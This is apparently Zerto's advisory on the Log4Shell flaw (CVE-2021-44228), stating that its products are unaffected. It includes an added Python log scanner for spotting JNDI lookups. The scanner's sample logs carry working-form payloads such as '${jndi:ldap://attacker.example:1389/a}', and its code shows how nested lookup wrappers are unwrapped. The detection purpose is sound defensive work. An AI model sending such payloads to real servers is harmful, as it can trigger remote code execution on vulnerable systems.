On December 11, 2021, Zerto, a Hewlett Packard Enterprise company, was made aware of a security event impacting Apache Log4j v2.x, associated with CVE-2021-44228 (also known as Log4Shell or LogJam).
What is Log4j?
Log4j is an open-source Java logging library that is widely used in a range of software applications and services around the world. The vulnerability can give threat actors the ability to take control of any Java-based, internet-facing server and carry out Remote Code Execution (RCE) attacks.
Log4j was found to be vulnerable to a format-string-style code execution bug that was not disclosed and patched in a coordinated manner. The bug abuses Log4j's JNDI lookup capabilities, which enable attackers to achieve Remote Code Execution (RCE).
The bug (CVE-2021-44228, also known as Log4Shell) causes the vulnerable component to actively connect out to the internet, fetch the malicious code, and run it.
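How a defender can spot these JNDI lookup strings in request logs, as an added Python example that is not part of Zerto's advisory; the log lines, hosts and field layout are constructed placeholders. It resolves nested `${...}` wrappers first, the way Log4j itself would, so a lookup is recognised regardless of how it was wrapped.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed web-server log lines (not from the page). Lines 2 and 3 carry a
# JNDI lookup string in the User-Agent field; attacker.example is a placeholder.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"
203.0.113.9 - - [11/Dec/2021:10:01:07 +0000] "GET /login HTTP/1.1" 200 "${jndi:ldap://attacker.example:1389/a}"
203.0.113.9 - - [11/Dec/2021:10:01:09 +0000] "GET /api HTTP/1.1" 404 "${JnDi:rmi://attacker.example:1099/b}"
"""

# Innermost ${name:arg} lookup, i.e. one with no further ${ } inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# The lookup we care about: ${jndi:<scheme>://<host:port>...}
_JNDI = re.compile(r"\$\{jndi:([a-z]+):(//)?([^}/]*)", re.IGNORECASE)

def _resolve(inner: str) -> str:
    """Evaluate one nested lookup as Log4j would (lower/upper/default value)."""
    if inner.lower().startswith("jndi:"):
        return "${" + inner + "}"          # keep the jndi lookup itself intact
    if ":-" in inner:                      # ${anything:-default} yields "default"
        return inner.split(":-", 1)[1]
    name, _, arg = inner.partition(":")
    if name.lower() == "lower":
        return arg.lower()
    if name.lower() == "upper":
        return arg.upper()
    return "${" + inner + "}"              # unknown lookup: leave unchanged

def normalize(text: str) -> str:
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(10):                    # bound the work on hostile input
        new = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text

@dataclass
class Hit:
    line_no: int
    scheme: str   # ldap, rmi, dns, ...
    target: str   # host:port the vulnerable server would connect out to

def find_jndi_lookups(log: str) -> list[Hit]:
    """Return one Hit per log line that contains a JNDI lookup string."""
    hits: list[Hit] = []
    for n, line in enumerate(log.splitlines(), 1):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append(Hit(n, m.group(1).lower(), m.group(3)))
    return hits
```

The `target` field is the host the vulnerable component would connect out to, which is the value to block at the egress firewall and to pivot on in other logs.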
Did Log4j Impact the Zerto Product?
We have completed the analysis of all Zerto products and have confirmed that none of them are vulnerable to the Log4Shell exploit. Specifically, Zerto components installed on customer environments are not implemented in Java, and therefore are not susceptible.
This is applicable for all versions of Zerto.
Please visit https://help.zerto.com/kb/000004822 for Zerto's official response.